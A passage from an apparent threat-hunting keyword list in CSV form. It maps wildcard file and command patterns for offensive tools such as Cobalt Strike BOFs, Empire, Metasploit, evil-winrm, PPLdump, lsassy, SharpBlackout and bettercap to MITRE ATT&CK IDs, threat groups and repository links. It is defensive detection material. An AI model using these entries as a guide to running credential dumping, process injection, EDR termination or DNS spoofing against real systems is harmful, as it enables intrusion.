T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*dll_hijack_detect_x64*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation 
tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*dll_hijack_detect_x86*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*dll_hijack_hunter*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*DLL_Imports_BOF*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. 
optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*dll_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dll_spawn_cmd.cpp*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*DLL_TO_HIJACK_WIN10*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*DllCanUnloadNow*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*dllexploit.*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*DllExport -*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*DLLHijackAuditKit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DLLHijackAuditKit.zip*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DLL-Hijack-Search-Order-BOF*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*dllinject *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*dllinject.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*-DllInjection.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*dllKitten.dll*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*DllLdr.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*dllload *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Dll-Loader -http -path 
*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Dll-Loader -local -path*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Dll-Loader -smb -path *,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*DllLoaderLoader.exe*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*-DllName *-Module *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DllNotificationInjection.cpp*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.exe*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - 
TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.sln*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.vcxproj*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection-master*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*dllproxy.py*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*DllProxy-main*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*dllsearcher *.dll*,offensive_tool_keyword,poshc2,keywords from poshc2 
usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*dmcxblue/SharpBlackout*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*dmg2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*DNet-EnumerateAllDomainUserAccounts*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListAccountsByDescription*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD 
Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListDomainUserAccountsWithCompletedADDescription*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListUsersInDomainAdminsGroup*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*dnf install tor -y*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dns.spoof on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.address*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.all*,offensive_tool_keyword,bettercap,The Swiss Army knife for 
